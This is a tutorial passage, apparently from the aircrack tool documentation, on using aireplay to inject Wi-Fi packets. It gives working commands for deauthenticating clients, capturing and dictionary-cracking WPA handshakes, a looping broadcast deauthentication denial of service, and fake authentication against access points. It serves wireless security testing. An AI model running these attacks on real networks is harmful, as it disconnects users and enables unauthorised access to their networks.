[HaBo]

How do I use aireplay ?

    If the driver was properly patched, aireplay is able to inject raw 802.11
    packets in Monitor mode; it currently implements a set of five different
    attacks.

    If you get "ioctl(SIOCGIFINDEX) failed: No such device", double check that
    your device name is correct and that you haven't forgotten a parameter on
    the command line.

    In the following examples, 00:13:10:30:24:9C is the MAC address of the
    access point (on channel 6), and 00:09:5B:EB:C5:2B is the MAC address of a
    wireless client.

      + Attack 0: deauthentication

        This attack is mostly useful to recover a hidden (not broadcasted)
        ESSID and for capturing WPA handshakes by forcing clients to
        reauthenticate. It can also be used to generate ARP requests as Windows
        clients sometimes flush their ARP cache when disconnected. Of course,
        this attack is totally useless if there are no associated wireless
        clients.

        It is usually more effective to target a specific station using the -c
        parameter.

        Some examples:

          o WPA Handshake capture with an Atheros

            airmon.sh start ath0
            airodump ath0 out 6  (switch to another console)
            aireplay -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0
            (wait for a few seconds)
            aircrack -w /path/to/dictionary out.cap

          o ARP request generation with a Prism2 card

            airmon.sh start wlan0
            airodump wlan0 out 6  (switch to another console)
            aireplay -0 5 -a 00:13:10:30:24:9C wlan0
            aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

            After sending the five batches of deauthentication packets, we
            start listening for ARP requests with attack 3. The -h option is
            mandatory and has to be the MAC address of an associated client.

            If the driver is wlan-ng, you must run the airmon.sh script;
            otherwise the card won't be correctly setup for injection.

          o Mass denial-of-service with a RT2500 card

            airmon.sh start ra0
            aireplay -0 0 -a 00:13:10:30:24:9C ra0

            With parameter 0, this attack will loop forever sending
            deauthentication packets to the broadcast address, thus preventing
            clients from staying connected.

      + Attack 1: fake authentication

        This attack is particularly useful when there are no associated
        clients: we create a fake client MAC address which will be registered
        in the AP's association table. This address will then be used for
        attacks 3 (ARP request reinjection) and 4 ("chopchop" WEP decryption).

        However if this attack fails and there is already an associated client,
        it's more reliable to just use his MAC address (here,
        00:09:5B:EB:C5:2B) in attacks 3 and 4.

        aireplay -1 0 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
        12:14:06  Sending Authentication Request
        12:14:06  Authentication successful
        12:14:06  Sending Association Request
        12:14:07  Association successful :-)

        +---------------------------------------------------------------------+
        | With patched madwifi CVS 2005-08-14, it's possible to inject        |
        | packets while in Managed mode (the WEP key itself doesn't matter,   |
        | as long as the AP accepts Open-System authentication). So, instead  |
        | of running attack 1, you may just associate and inject / monitor    |
        | through the athXraw interface:                                      |
        |                                                                     |
        | ifconfig ath0 down hw ether 00:10:20:30:40:50                       |
        | iwconfig ath0 mode Managed essid myap key AAAAAAAAAA                |
        | ifconfig ath0 up                                                    |
        |                                                                     |
        | sysctl -w dev.ath0.rawdev=1                                         |
        | ifconfig ath0raw up                                                 |
        | airodump ath0raw out 6                                              |
        |                                                                     |
        | Then you can run attack 3 or 4 (aireplay will automatically replace |
        | ath0 with ath0raw below):                                           |
        |                                                                     |
        | aireplay -3 -h 00:10:20:30:40:50 -b 00:13:10:30:24:9C ath0          |
        | aireplay -4 -h 00:10:20:30:40:50 -f 1 ath0                          |
        |                                                                     |
        +---------------------------------------------------------------------+

        Some access points require to reassociate every 30 seconds, otherwise
        our fake client is considered disconnected. In this case, setup the
        periodic re-association delay:

        aireplay -1 30 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0

        If this attacks seems to fail (aireplay keeps sending authentication
        requests), MAC address filtering may be in place. Also make sure that:

          o You are close enough to the access point.
          o The driver is properly patched and installed.
          o The card is configured on the same channel as the AP.
          o The BSSID and ESSID (-a / -e options) are correct.
          o If Prism2, make sure the firmware was updated.

        As a reminder: you can't inject with a Centrino, Hermes, ACX1xx,
        Aironet, Marvel or Broadcom chipset because of firmware and/or driver
        limitations.